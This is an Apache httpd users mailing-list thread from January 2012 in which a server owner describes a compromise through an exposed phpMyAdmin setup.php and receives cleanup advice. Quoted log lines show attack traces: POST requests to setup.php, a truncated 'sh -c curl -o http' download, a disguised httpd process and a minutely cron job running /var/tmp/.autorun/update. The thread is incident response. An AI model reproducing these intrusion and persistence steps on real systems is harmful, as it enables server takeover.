Re: [users@httpd] attack on apache - solved -

2012-01-16 Thread Simone Caruso
> > xx.xxx.xx.xx "GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1" 200 14049 "-"
> "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
> xx.xxx.xxx.xx "POST /admin/phpmyadmin/scripts/setup.php HTTP/1.1" 200 -
> "http://xxx.xx.xx.xx/admin/phpmyadmin/scripts/setup.php\r"

RE: [users@httpd] attack on apache - solved -

2012-01-13 Thread Luisa Ester Navarro
> Date: Fri, 13 Jan 2012 15:32:55 -0500
> To: users@httpd.apache.org
> From: storm...@stormy.ca
> Subject: Re: [users@httpd] attack on apache - solved -
>
> At 04:48 PM 1/13/2012 -0300, you wrote:
> >Thanks a lot to everyone who helped me to solve the problem.
>

Re: [users@httpd] attack on apache - solved -

2012-01-13 Thread Stormy
At 04:48 PM 1/13/2012 -0300, you wrote:
Thanks a lot to everyone who helped me to solve the problem.
I had installed phpmyadmin and they used it to attack my server.
I found this in /var/log/httpd/access_log

Was your compile of apache2 "prefork" or "worker"? And could you be a little more expli

Re: [users@httpd] attack on apache - solved -

2012-01-13 Thread congo thomas
On Fri, January 13, 2012 20:48, Luisa Ester Navarro wrote:
>
> Thanks a lot to everyone who helped me to solve the problem.
> I had installed phpmyadmin and they used it to attack my server.
> I found this in /var/log/httpd/access_log

So which measures did you take into account to fix the problem?

[users@httpd] attack on apache - solved -

2012-01-13 Thread Luisa Ester Navarro
Thanks a lot to everyone who helped me to solve the problem.
I had installed phpmyadmin and they used it to attack my server.
I found this in /var/log/httpd/access_log

Cheers
Luisa

Re: [users@httpd] attack on apache

2012-01-11 Thread Jaco Kroon
Hi, On 12/01/12 00:14, Jeroen Geilman wrote: On 01/11/2012 10:10 PM, Jaco Kroon wrote: On 11/01/12 22:37, Luisa Ester Navarro wrote: J. Thanks Jeroen: any idea how to start researching which is the leaky scr

Re: [users@httpd] attack on apache

2012-01-11 Thread Jeroen Geilman
On 01/11/2012 10:10 PM, Jaco Kroon wrote: On 11/01/12 22:37, Luisa Ester Navarro wrote: J. Thanks Jeroen: any idea how to start researching which is the leaky script Cheers Luisa Hehe, this is where they say,

Re: [users@httpd] attack on apache

2012-01-11 Thread Jaco Kroon
On 11/01/12 22:37, Luisa Ester Navarro wrote: J. Thanks Jeroen: any idea how to start researching which is the leaky script Cheers Luisa Hehe, this is where they say, RTFS, or as Jeroen suggested, see if you ca

Re: [users@httpd] attack on apache

2012-01-11 Thread Kevin A. McGrail
any idea how to start researching which is the leaky script

Checking the access log for the same ip that was getting the errors you found in the error_log is a good start.

RE: [users@httpd] attack on apache

2012-01-11 Thread Luisa Ester Navarro
Date: Wed, 11 Jan 2012 21:13:53 +0100
From: jer...@adaptr.nl
To: users@httpd.apache.org
Subject: Re: [users@httpd] attack on apache

On 01/11/2012 09:10 PM, Jaco Kroon wrote:
On 11/01/12 21:35, Jeroen Geilman wrote

Re: [users@httpd] attack on apache

2012-01-11 Thread Jeroen Geilman
On 01/11/2012 09:10 PM, Jaco Kroon wrote:
On 11/01/12 21:35, Jeroen Geilman wrote:
In /var/log/httpd/error_log I see things like this
sh: del comand no found
sh: xx Permission denied
I need help !

1. Stop apache.
2. investigate which leaky, creaky or lousy PHP script allowed this exploit.

Re: [users@httpd] attack on apache

2012-01-11 Thread Jaco Kroon
On 11/01/12 21:35, Jeroen Geilman wrote:
In /var/log/httpd/error_log I see things like this
sh: del comand no found
sh: xx Permission denied
I need help !

1. Stop apache.
2. investigate which leaky, creaky or lousy PHP script allowed this exploit.
3. remove the bad script.
4. Remount /tmp

Re: [users@httpd] attack on apache

2012-01-11 Thread Jeroen Geilman
On 01/11/2012 08:24 PM, Luisa Ester Navarro wrote:
From: luisa2...@hotmail.com
To: users@httpd.apache.org
Subject: RE: [users@httpd] attack on apache
Date: Wed, 11 Jan 2012 16:15:14 -0300

> Date: Mon, 9 Jan 2012 17

RE: [users@httpd] attack on apache

2012-01-11 Thread Luisa Ester Navarro
From: luisa2...@hotmail.com
To: users@httpd.apache.org
Subject: RE: [users@httpd] attack on apache
Date: Wed, 11 Jan 2012 16:15:14 -0300

> Date: Mon, 9 Jan 2012 17:30:21 +
> From: tevans...@googlemail.com
> To: users@httpd.apache.org
> Subject: Re: FW: [users@http

Re: FW: [users@httpd] attack on apache

2012-01-09 Thread Tom Evans
On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro wrote:
>
> I didn't have any cronjobs but when I detected the attack I saw one in
> /var/spool/cron
> My logfile says
> User apache:
>
>    /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
>

FW: [users@httpd] attack on apache

2012-01-09 Thread Luisa Ester Navarro
al crontab replaced: 1 Time(s)
Thanks

> Date: Mon, 9 Jan 2012 18:05:38 +0100
> From: i...@simonecaruso.com
> To: users@httpd.apache.org
> CC: luisa2...@hotmail.com
> Subject: Re: [users@httpd] attack on apache
>
> On 09/01/2012 16:11, Luisa Ester Navarro wrote:
> > My se

Re: [users@httpd] attack on apache

2012-01-09 Thread Simone Caruso
On 09/01/2012 16:11, Luisa Ester Navarro wrote: > My server is being attacked. I think it is from apache because I have found > commands running with the owner apache. > My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL > and sh -c curl -o http > I don't think the

[users@httpd] attack on apache

2012-01-09 Thread Luisa Ester Navarro
My server is being attacked. I think it is from apache because I have found commands running with the owner apache. My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL and sh -c curl -o http They also run every minute a crontab from /var/spool/cron and I didn't ha